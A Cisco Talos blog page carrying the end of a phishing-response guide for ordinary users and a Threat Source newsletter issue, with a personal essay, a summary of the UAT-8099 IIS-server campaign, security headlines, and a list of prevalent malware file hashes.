*   Make sure no files downloaded to your device; if so, delete them without opening. 
*   Monitor your device for unusual behavior, which can be a sign of malware. 
    *   _**Examples:** Higher-than normal battery drainage, apps crashing, unknown apps/profiles, and persistent pop-ups_ 
*   Stay alert for suspicious emails, texts, or calls.

Together, these steps help you catch and remove any threats before they cause harm, and keep you aware of follow-up attacks.

**Scenario 2: You entered your username and password **

Entering credentials on a phishing site can give attackers access to your account, leading to unauthorized activity, identity theft or further phishing. 

*   Change your password **immediately** for that account, and force a logout of all devices logged in. This locks out any unauthorized users who may have gained access. 
*   If you have multifactor authentication (MFA) enabled, watch for any push notifications that you did not initiate. Do not approve them. This could mean someone is actively trying to log in with your stolen credentials. 
*   Enable two-factor authentication (2FA) if available. 
*   Create new, unique passwords for any other accounts that used the same credentials. Attackers often try your compromised password on multiple sites (aka called credential stuffing). 
    *   _**Tip:** Instead of storing your credentials in your browser, use a password manager such as 1Password._ 
*   Watch for suspicious account activity.

By following these steps, you limit the attacker’s access and protect your other accounts from being compromised. 

**Scenario 3: You entered credit card or banking information **

Financial data can be quickly exploited for fraudulent transactions, identity theft, or even sold on the dark web. 

*   Contact your bank or card issuer right away. 
*   If possible, freeze your card and get a replacement. 
*   Monitor your statements and report any unauthorized charges. 
*   Enable fraud alerts if your bank offers them.

These actions help you contain the risk, minimize financial losses, and alert your bank to potential fraud on your account.

**Scenario 4: You downloaded or opened a file **

Downloaded files from suspicious links can contain malware, ransomware, spyware or other harmful software that may steal your data or harm your device. 

*   Disconnect your device from the internet until you have completed all of these steps. Isolating your device can prevent malware from communicating with attackers or spreading to other devices. 
*   Run a full antivirus and malware scan if on a desktop or laptop. 
*   Check to ensure no new apps were installed if on a phone. 
*   Delete any suspicious files. 
*   In a worst-case scenario, if you have conducted periodic backups it might be best to restore your device to a clean version, from before the file was downloaded.

**Remember to: **

*   Always verify links before you click on them.  
    *   _Tip: Hover over the link to make sure it leads to an official website. If you’re not sure, it’s safer to type in the URL manually._ 
*   Enable multifactor authentication for your accounts whenever it’s available. 
*   Keep your software and antivirus updated. 
*   Report all phishing attempts to your email provider and IT/security team. 

Phishing attacks are getting more sophisticated, but a little knowledge goes a long way. Share this guide with your friends and family so they’ll know what to do if they ever click a suspicious link.

Happy Cybersecurity Awareness Month from Cisco Talos!

What to do when you click on a suspicious link

A simple yet effective tactic, known as hidden text salting, is increasingly used by cybercriminals over the past few months to evade even the most advanced email security solutions, including those powered by machine learning and large language models.

Too salty to handle: Exposing cases of CSS abuse for hidden text salting

Amy gives an homage to parents in family group chats everywhere who want their children to stay safe in this wild world.

Thursday, October 2, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter, and happy Cybersecurity Awareness Month.

Like everyone under the age of 35 who has at least one father, my dad sends me advice on online safety at least once a week. Does he work in information security? No. He’s a recently retired high school audio engineering teacher, who now spends his days touring with a yacht rock cover band and building guitars. But throughout his life, he’s been a true Renaissance man. From playing trombone on a Bruce Springsteen tour to building our backyard deck, to Roth IRA advice, to the history of Bell Labs, the breadth of his knowledge astounds me. I actually called him last week to find out just _how long_ I can drive my car before taking it to the mechanic to get the oxygen sensor fixed.

There is one area where I think I have him beat: cybersecurity. Not by a lot, but I think working in Talos has given me an edge — or, at least, access to people who can tell me how worried I should be about an issue that Facebook is having a field day with.

Still, that doesn’t stop him from sending me a steady stream of headlines and warnings. Here are just a few that my dad has sent me:

*   **Jan. 31, 2024:** An NBC news clip of former FBI Director Christopher Wray disclosing alarming hacking threats to critical U.S. infrastructure, also mentioning the takedown of Volt Typhoon. 
*   **Sept. 19, 2024:** An article explaining that if you’re shopping online and your credit card gets declined, you may be getting scammed. 
*   **May 1, 2025:** A video warning that “QR codes in mystery packages could steal your identity.” 
*   **June 22, 2025:** This video about hidden watermarks embedded in AI-generated content. Not nearly as menacing as the others (unless you're a college student trying to coast), but it _is_ fascinating. This article gives a deeper understanding. 

Even without deep investigation, these headlines reveal a lot about how cybersecurity anxieties are shared and amplified on social media. It’s a cycle that’s probably familiar to a lot of us: technology keeps evolving, but the impulse to protect each other never really changes. Whether you’re the IT help desk for your family or the one receiving those late-night warnings (or both), every message is a chance to share knowledge, calm fears, and help each other navigate a world that’s always shifting under our feet.

So, the next time your dad (or mom, or aunt, or grandma) sends you a link that sounds a little far-fetched, take a moment to appreciate the intent behind it. They might not always get the details right, but their concern is real. In its own way, that’s another layer of security.

Breathe in, let it out, and let’s dive in.

**The one big thing **

Cisco Talos has uncovered a Chinese-speaking cybercrime group, UAT-8099, that is hacking into reputable Internet Information Services (IIS) servers in countries like India, Thailand, Vietnam, Canada, and Brazil. Their main goals are to manipulate search results for profit and steal sensitive data, such as credentials and certificates, often using advanced tools and custom malware to avoid detection. The group maintains long-term access to these servers and protects their control from other attackers.

**Why do I care? **

Cybercriminals are evolving to target trusted infrastructure for both financial gain and deeper access to valuable data. The use of automation, custom malware, and persistence techniques in this campaign shows UAT-8099 can impact a wide range of organizations.

**So now what? **

Review your environments for signs of BadIIS malware, unauthorized web shells and suspicious RDP or VPN activity on IIS servers. Also, strengthen server defenses, monitor for unusual traffic and share indicators of compromise (IOCs) within the security community to help prevent further attacks.

**Top security headlines of the week **

**CISA 2015 cyber threat info-sharing law lapses amid government shutdown**   
Defenders have lost the information-sharing liability protection the bill provided, and the government has lost a lot of visibility into threats emerging across the private sector. (CSO) 

**Cyberattack on JLR prompts £1.5B UK government intervention**   
The announcement Sunday says that the support package is meant to “give certainty to its supply chain following a recent cyber-attack.” Some experts believe the bailout will encourage cybercriminals to continue targeting UK companies with weak cybersecurity. (Security Week) 

**Neon pays users to record their phone calls and sells data to AI firms**   
Unbelievably, this app was spotted in the No. 2 spot in Apple’s U.S. App Store’s Social Networking section. Their marketing claims to only record your side of the call unless it’s with another Neon user. (TechCrunch) 

**"Klopatra" trojan makes bank transfers while you sleep**   
A sophisticated new banking malware is hard to detect, capable of stealing lots of money, and infecting thousands of people in Italy and Spain, under the guise of a pirate streaming app. (Dark Reading) 

**Can’t get enough Talos? **

**Talos Takes: You can’t patch burnout**   
October is Cybersecurity Awareness Month, but what happens when the defenders themselves are overwhelmed? In this powerful episode, Hazel and Joe Marshall get real about why protecting your well-being is just as vital as any technical defense. 

**The TTP: Threat Hunter’s Cookbook**   
Hear from Ryan Fetterman and Sydney Marrone from the SURGe team (now part of Cisco’s Foundation AI group), who wrote the Threat Hunter’s Cookbook: a collection of practical “recipes” security teams can pick up and apply. 

**Engaging Cisco Talos Incident Response**    
You’ve called Talos IR about a cyber incident — now what happens? This blog post takes you behind the scenes of a Talos IR engagement, from picking up the phone to recovery and implementation of long-term security improvements.  

**Upcoming events where you can find Talos **

*   Wild West Hackin' Fest (Oct. 8 – 10) Deadwood, SD 
*   DEEP Conference (Oct. 22 – 23) Petrčane, Croatia 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a**    
MD5: 1f7e01a3355b52cbc92c908a61abf643    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a    
Example Filename:cleanup.bat    
Detection Name: W32.D933EC4AAF-90.SBX.TG 

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Example Filename:VID001.exe    
Detection Name: Win.Worm.Coinminer::1201 

**SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610**    
MD5: 85bbddc502f7b10871621fd460243fbc    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610    
Example Filename:85bbddc502f7b10871621fd460243fbc.exe   
Detection Name: W32.41F14D86BC-100.SBX.TG 

**SHA256: 3d8eeb6df4a2d777f18d0f15b19cd9666a78927013b8359c883bff423d9faaec**    
MD5: 5b7948e7ca9742a33be8403b3285a1aa    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=3d8eeb6df4a2d777f18d0f15b19cd9666a78927013b8359c883bff423d9faaec    
Example Filename:onestart.exe    
Detection Name: W32.3D8EEB6DF4-95.SBX.TG 

**SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe**    
MD5: bf9672ec85283fdf002d83662f0b08b7    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe    
Example Filename:f\_04b985.html    
Detection Name: W32.C0AD494457-95.SBX.TG

Family group chats: Your (very last) line of cyber defense

Cisco Talos is disclosing details on UAT-8099, a Chinese-speaking cybercrime group mainly involved in SEO fraud and theft of high-value credentials, configuration files, and certificate data.